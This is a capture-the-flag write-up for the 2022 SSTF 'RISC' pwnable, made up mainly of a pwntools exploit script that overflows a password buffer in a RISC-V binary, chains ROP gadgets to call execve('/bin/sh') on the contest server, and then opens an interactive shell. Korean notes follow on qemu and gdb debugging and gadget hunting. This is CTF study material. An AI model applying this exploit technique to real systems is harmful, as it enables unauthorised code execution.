2022 SSTF CTF (Hacker's Playground) RISC Pwnable Write-Up

from pwn import*
def slog(n, m): return success(": ".join([n, hex(m)]))
context.log_level = 'debug'


# p = process(['./qemu-riscv64','-g','9988','./target'])
# p = process(['./qemu-riscv64','./target'])
p = remote('riscy.sstf.site', 18223)

get_a7 = 0x2b568
ecall_ret = 0x3b8c4
binsh = 0x6ecaf

payload = b'250382'
payload += b'\x00'
payload += b'B'*(32-len(payload))
payload += p64(0x6eccf) #s0 #write_table
payload += p64(0x0000000000010448) #first_ret in start #$sp-48

# read in main to 0x6eccf
# a0             0x0    0
# a1             0x6ec9f    453791
# a2             0x100    256
# insert bss(0x6ec9f) 0x0000000000026156

payload += b'D'*32
payload += p64(0x6eccf+0x10) #s0 'flag'
payload += p64(0x0000000000010448) #second_ret in start

payload += b'D'*32
payload += b'B'*8 #s0
payload += p64(0x0000000000010A68) #third_ret in start
#ra -> 0x10a68
#s0 -> B

#### csu chainning in 0x10a68 ####
payload += b'D'*16 #s5
payload += p64(ecall_ret) #s4 -> size -> a2
payload += p64(0) #s3 -> buf -> a1
payload += p64(binsh) #s2 -> fd -> a0
payload += p64(0x4444444444444444-1) #s1 -> func
payload += p64(0x6ec9f) #s0 -> func
payload += p64(0x0000000000010A22) #jump

#### setting a7 ####
payload += b'A'*8 #s0
payload += p64(0) #a1
payload += p64(binsh) #a0
payload += p64(0xdd) #a7

# pause()
p.sendafter('Password:',payload)

p.sendafter('Password:',p64(get_a7)) #open // write
# (gdb) x/10x 0x6ec9f
# 0x6ec9f <static_slotinfo+15>:    0x56    0x61    0x02    0x00    0x00    0x00    0x00    0x00
# 0x6eca7 <static_slotinfo+23>:    0x00    0x00

p.sendafter('Password:','/bin/sh\x00')

p.interactive()

 

- csu_chainning

- RISC-V syscall 루틴 이용

- 새로운 ISA 가젯찾기

1. qemu-riscv64 -g (원하는 포트) ./target
./qemu-riscv64 -g 9999 ./target

2. 다른 터미널 열기

3. gdb-multiarch (pwndbg는 잘안됨)
(gdb) target remote localhost:(연포트)
target remote localhost:9999

(gdb) set arch riscv:rv64
The target architecture is assumed to be riscv:rv64

(gdb) file ./target 
Reading symbols from ./target...
(No debugging symbols found in ./target)

4. 완료
(gdb) disassemble start
Dump of assembler code for function start:
   0x0000000000010434 <+0>:    addi    sp,sp,-48
   0x0000000000010436 <+2>:    sd    ra,40(sp)
   0x0000000000010438 <+4>:    sd    s0,32(sp)
   0x000000000001043a <+6>:    addi    s0,sp,48
   0x000000000001043c <+8>:    lui    a5,0x4c
   0x0000000000010440 <+12>:    addi    a0,a5,656 # 0x4c290
   0x0000000000010444 <+16>:    jal    ra,0x1aa04 <puts>
   0x0000000000010448 <+20>:    lui    a5,0x4c
   0x000000000001044c <+24>:    addi    a0,a5,680 # 0x4c2a8
   0x0000000000010450 <+28>:    jal    ra,0x14f34 <printf>
   0x0000000000010454 <+32>:    addi    a5,s0,-48
   0x0000000000010458 <+36>:    li    a2,32
   0x000000000001045c <+40>:    li    a1,0
   0x000000000001045e <+42>:    mv    a0,a5

5. 가젯찾기
./xrop ../sstf2022/riscy_4d8eea5aee06d1a109c05a7b1d33e06b/release/deploy/qemu-riscv64 target
이거 근데 잘 안됨 => objdump 이용

https://dokhakdubini.tistory.com/51

[ROP] gadget찾는법